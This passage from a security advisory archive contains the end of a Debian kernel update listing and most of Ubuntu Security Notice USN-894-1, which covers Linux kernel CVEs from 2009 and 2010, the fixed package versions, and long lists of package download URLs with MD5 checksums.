http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:  3651402 a0194c650712040f81e97d5b3b62bc79\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:   264892 0b642e20f00b52c20b6ae9e0ee1f78b8\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:    83442 6d109d7f131dab564736e2ac6a85dd29\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum: 13318532 dbce062bfa560c331b75bed073868e1d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum: 13019464 b0b153fafa43b650e996a9d84bbb26d7\n\n  These changes will probably be included in the oldstable distribution on\n  its next update. ===========================================================\nUbuntu Security Notice USN-894-1          February 05, 2010\nlinux, linux-source-2.6.15 vulnerabilities\nCVE-2009-4020, CVE-2009-4021, CVE-2009-4031, CVE-2009-4138,\nCVE-2009-4141, CVE-2009-4308, CVE-2009-4536, CVE-2009-4538,\nCVE-2010-0003, CVE-2010-0006, CVE-2010-0007, CVE-2010-0291\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 8.04 LTS\nUbuntu 8.10\nUbuntu 9.04\nUbuntu 9.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  linux-image-2.6.15-55-386       2.6.15-55.82\n  linux-image-2.6.15-55-686       2.6.15-55.82\n  linux-image-2.6.15-55-amd64-generic  2.6.15-55.82\n  linux-image-2.6.15-55-amd64-k8  2.6.15-55.82\n  linux-image-2.6.15-55-amd64-server  2.6.15-55.82\n  linux-image-2.6.15-55-amd64-xeon  2.6.15-55.82\n  linux-image-2.6.15-55-hppa32    2.6.15-55.82\n  linux-image-2.6.15-55-hppa32-smp  2.6.15-55.82\n  linux-image-2.6.15-55-hppa64    2.6.15-55.82\n  linux-image-2.6.15-55-hppa64-smp  2.6.15-55.82\n  linux-image-2.6.15-55-itanium   2.6.15-55.82\n  linux-image-2.6.15-55-itanium-smp  2.6.15-55.82\n  linux-image-2.6.15-55-k7        2.6.15-55.82\n  linux-image-2.6.15-55-mckinley  2.6.15-55.82\n  linux-image-2.6.15-55-mckinley-smp  2.6.15-55.82\n  linux-image-2.6.15-55-powerpc   2.6.15-55.82\n  linux-image-2.6.15-55-powerpc-smp  2.6.15-55.82\n  linux-image-2.6.15-55-powerpc64-smp  2.6.15-55.82\n  linux-image-2.6.15-55-server    2.6.15-55.82\n  linux-image-2.6.15-55-server-bigiron  2.6.15-55.82\n  linux-image-2.6.15-55-sparc64   2.6.15-55.82\n  linux-image-2.6.15-55-sparc64-smp  2.6.15-55.82\n\nUbuntu 8.04 LTS:\n  linux-image-2.6.24-27-386       2.6.24-27.65\n  linux-image-2.6.24-27-generic   2.6.24-27.65\n  linux-image-2.6.24-27-hppa32    2.6.24-27.65\n  linux-image-2.6.24-27-hppa64    2.6.24-27.65\n  linux-image-2.6.24-27-itanium   2.6.24-27.65\n  linux-image-2.6.24-27-lpia      2.6.24-27.65\n  linux-image-2.6.24-27-lpiacompat  2.6.24-27.65\n  linux-image-2.6.24-27-mckinley  2.6.24-27.65\n  linux-image-2.6.24-27-openvz    2.6.24-27.65\n  linux-image-2.6.24-27-powerpc   2.6.24-27.65\n  linux-image-2.6.24-27-powerpc-smp  2.6.24-27.65\n  linux-image-2.6.24-27-powerpc64-smp  2.6.24-27.65\n  linux-image-2.6.24-27-rt        2.6.24-27.65\n  linux-image-2.6.24-27-server    2.6.24-27.65\n  linux-image-2.6.24-27-sparc64   2.6.24-27.65\n  linux-image-2.6.24-27-sparc64-smp  2.6.24-27.65\n  linux-image-2.6.24-27-virtual   2.6.24-27.65\n  linux-image-2.6.24-27-xen       2.6.24-27.65\n\nUbuntu 8.10:\n  linux-image-2.6.27-17-generic   2.6.27-17.45\n  linux-image-2.6.27-17-server    2.6.27-17.45\n  linux-image-2.6.27-17-virtual   2.6.27-17.45\n\nUbuntu 9.04:\n  linux-image-2.6.28-18-generic   2.6.28-18.59\n  linux-image-2.6.28-18-imx51     2.6.28-18.59\n  linux-image-2.6.28-18-iop32x    2.6.28-18.59\n  linux-image-2.6.28-18-ixp4xx    2.6.28-18.59\n  linux-image-2.6.28-18-lpia      2.6.28-18.59\n  linux-image-2.6.28-18-server    2.6.28-18.59\n  linux-image-2.6.28-18-versatile  2.6.28-18.59\n  linux-image-2.6.28-18-virtual   2.6.28-18.59\n\nUbuntu 9.10:\n  kernel-image-2.6.31-108-imx51-di  2.6.31-108.21\n  linux-image-2.6.31-19-386       2.6.31-19.56\n  linux-image-2.6.31-19-generic   2.6.31-19.56\n  linux-image-2.6.31-19-generic-pae  2.6.31-19.56\n  linux-image-2.6.31-19-ia64      2.6.31-19.56\n  linux-image-2.6.31-19-lpia      2.6.31-19.56\n  linux-image-2.6.31-19-powerpc   2.6.31-19.56\n  linux-image-2.6.31-19-powerpc-smp  2.6.31-19.56\n  linux-image-2.6.31-19-powerpc64-smp  2.6.31-19.56\n  linux-image-2.6.31-19-server    2.6.31-19.56\n  linux-image-2.6.31-19-sparc64   2.6.31-19.56\n  linux-image-2.6.31-19-sparc64-smp  2.6.31-19.56\n  linux-image-2.6.31-19-virtual   2.6.31-19.56\n  linux-image-2.6.31-211-dove     2.6.31-211.22\n  linux-image-2.6.31-211-dove-z0  2.6.31-211.22\n  linux-image-2.6.31-304-ec2      2.6.31-304.10\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change (except for Ubuntu 6.06)\nthe kernel updates have been given a new version number, which requires\nyou to recompile and reinstall all third party kernel modules you\nmight have installed. Unless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-server, linux-powerpc), a standard system\nupgrade will automatically perform this as well. \n\nDetails follow:\n\nAmerigo Wang and Eric Sesterhenn discovered that the HFS and ext4\nfilesystems did not correctly check certain disk structures. (CVE-2009-4021)\n\nIt was discovered that KVM did not correctly decode certain guest\ninstructions.  A local attacker in a guest could exploit this to\ntrigger high scheduling latency in the host, leading to a denial of\nservice. (CVE-2009-4138)\n\nTavis Ormandy discovered that the kernel did not correctly handle\nO_ASYNC on locked files. (CVE-2009-4141)\n\nNeil Horman and Eugene Teo discovered that the e1000 and e1000e\nnetwork drivers did not correctly check the size of Ethernet frames.  A local attacker could exploit\nthis, leading to a loss of privacy. (CVE-2010-0003)\n\nOlli Jarva and Tuomo Untinen discovered that IPv6 did not correctly\nhandle jumbo frames. (CVE-2010-0291)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz\n      Size/MD5:  2928444 765d0254f54d27d447de8f0b39548848\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc\n      Size/MD5:     2921 682576890de917043eccf6fc9398aed2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz\n      Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb\n      Size/MD5:  5170062 ef1a9c95890c4ba600a3e5523d49bb59\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb\n      Size/MD5:    96386 b184441d2f44037554d037d217688393\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb\n      Size/MD5: 44742098 b5215eb163e357a179dbf36169ae1fa2\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    22350 d8934981c2fdd09168a5e576cc1b809a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    44768 74be7582e8f82aeb48af59731ce128be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     2312 d464c76f98a4142add7a69aca1305739\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    36294 a65060e99feff7e2ecef38be6d92fbc3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   102366 04d59c868ce03dc83b69116b022735b8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    38892 e80a653bb000e86f38da594d4bc1742d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    49160 a512718368004f81e83063ea8972c871\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   176612 81ab4c185b3af1dea1a082283c1ec9b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    36776 fcb0833daefa645545a2451824094b21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   142346 3e6446140bfad0b19c512c69377d8026\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    51060 a11ceed7ccb1b96c2a8b2e7f840061b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   140710 e1789bb9d7cdd542a862e8ef209de802\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   287606 f3cc835959f215c209dc5a825596849c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    97828 05627ddbba40a6517ae7f8ca75f195c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1652102 c9eea2df3fdde2a5e7d2f4dff99e6772\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb\n      Size/MD5:   872314 6e8f80e117e13665c95fb75593853d49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb\n      Size/MD5:   872448 1a70a906bccd7642241535f79feddb57\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb\n      Size/MD5:   874570 0da9cd27666b58b5328e18dbc01c9b2e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb\n      Size/MD5:   872194 375aad441654cdcd2338c5809e6319ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb\n      Size/MD5:  6926870 c5868857ae3e12da5ffd91ec60d75501\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb\n      Size/MD5: 20817720 06e066129d82d4fa8e41a2a058dcb9f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb\n      Size/MD5: 20798158 1e5bf064dc2aab9880b30448d06eba9d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb\n      Size/MD5: 21635636 0bb9fd3f753b4dcedf70fa8f36c48467\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb\n      Size/MD5: 19905244 a04e5f6463fe334c28598cbf13506043\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    15630 8d1da510f959f7b9a2d0aa73ab80ae39\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   240360 20cd65fa275cfe8a83743ddb5a95f528\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   202666 71d8be83541874d6c675945838b9e223\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1048610 9125e9e6c294bb450e37643b3ed7397e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1543634 ff7af4dcfc269a529f0adef3823a7244\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   161692 5623fa9ad6b280d0a5271917e89ca8ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     9832 bd5218587371f5b309ef2d1f77f98420\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    80870 20f034d6199d2902130f8bba12f48afe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    49294 e4a805200acaaea274e67995602294e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    35158 0869bee234a54b1afe362123606efe66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    70890 74ad81f0209c505c41d61c143b90f879\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     6218 ab28cdccb61315cac14d9046821e264d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     9060 6b179cd944eb7f83f03147e09025e6be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    57924 5465064d051dec863ad3f4f1a91553f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   123380 18eabdae11c2d77a1694f0cd467107a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   101078 efbe32714c0fed5aec8a70095af299df\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    79272 2fbe8585b11e0fa73fad8e94298082bf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1595398 3e11b94ed4701d1d84b6aeb303782d97\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    72352 e413c3057779de1b3c8f0c4d8d7fb577\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    12648 41487d8dc828d7f94a5c8ed495f06a99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    33806 ebf707126fa6326899d648786afa8779\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   138512 ff1e0d4f0e9c5efc7bbae4d92194da5d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    38938 75eb074224a6373013e621cdd5931a51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   278876 1586e5c6fc3fedf7f63f19c35a4fd9e8\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    18976 940a7c03cfe47e9d0543f49849c8765f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    43482 466c625f614e3624fa548bc5f96efa74\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   105216 d45ce18fb4d9c2cf5da6d14ae69a86c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     2284 de2293fa5c6e5493307a1913b606ad20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    34572 4e302b4f7144fd504b2475a4103a3bf5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    97044 eeafb6c943244dd33659e7e7db9a9f76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    37128 d4d67e516f236bf54a00697b71a3219b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    44122 1657e3520cbd2fbc832cf91bd6366a38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   167738 7431ddaa7c8f0c9b6e583129cdc839f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    33954 8251d509fb9bacd314f62cc90bda5b96\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   137972 9b8295fffc47ab4cf16ec34f7ef8b7aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    46892 c12096744faa1ca0735b62ea045b0c65\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   133162 5805bb2e2bfab6158d8d217b08079cc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   273806 be7956f256f494fe4f40e7e7129bdcd7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   102330 d6a81f9c342c0ebe2010b66d4a7c59ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1597678 ab989d0c749b837c67a2a839f139fbb2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb\n      Size/MD5:   863294 c444f51c8b2752c6a7bb7e6890917ae2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb\n      Size/MD5:   862506 1508b314277964abb0d05e8a274d2a26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb\n      Size/MD5:   863628 69ee54c68825997e29779c3a2ab66625\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb\n      Size/MD5:   866414 fa045eb17626dde56b96d70431e9515b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb\n      Size/MD5:   865826 30916e33e56490d9a2acf31c03690e64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb\n      Size/MD5:  6918500 a2bb7aa892eb2d21ea3d04f519b72482\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb\n      Size/MD5: 21724666 e1390cea2d5e21dee938aaf3f88786f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb\n      Size/MD5: 22516786 35a5512e74cf490346c35fd56f695fca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb\n      Size/MD5: 22265258 07155a925272e66ace552f82d16b1b79\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb\n      Size/MD5: 23626692 d229112410ce8c9c9947f2f7cd32c883\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb\n      Size/MD5: 23179552 9b108d16a1fc1716b78c4417150e311e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    15512 4a2a37534dc2bc6b0ce12df135d07105\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   238510 544c418a7426a5248e33ff549c6f4035\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   197134 9ec57cc477f5bc4e0dba11002d3988e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1048370 cd87ff58b5cbea9c04eac21cf1b0784c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1741406 0b97758852f283e148ec2ce290e678ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   160884 ce6d2a16b8a3af5706b694fe6f8ac4f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     9162 d5f4619ccc32c2ed8296823cd3c19e3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    76468 9f0911cef3a4b7afb14f1bd537ad337e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    53554 afc415fd0a28c363579986fc48464671\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    33048 c710f55e8853bec0935df3338f2370c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    85618 b6ed96be15afaf31e6670a78ff1f4733\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     6024 b0a622b932e40a7011d5e9ec9bd21eb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     8762 6234ceb3aa1422433ee60ad4305c03e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    53636 e1a35b8801fb949295040028cd2cba5e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   130970 25d88aae6168f72c58ca17584b3f83e0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    98468 ddb974591a687460f50c26a2e2682593\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    77212 a9ec9f2fe551ec07e56200b26f1de4f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1768830 477e2985e9f1fd2d4f333d651ce07e2f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    69612 2547b29a65a8391d3a085bbf2ce476aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    11764 88566d97534c428d1ef6b01b5adde2ab\n    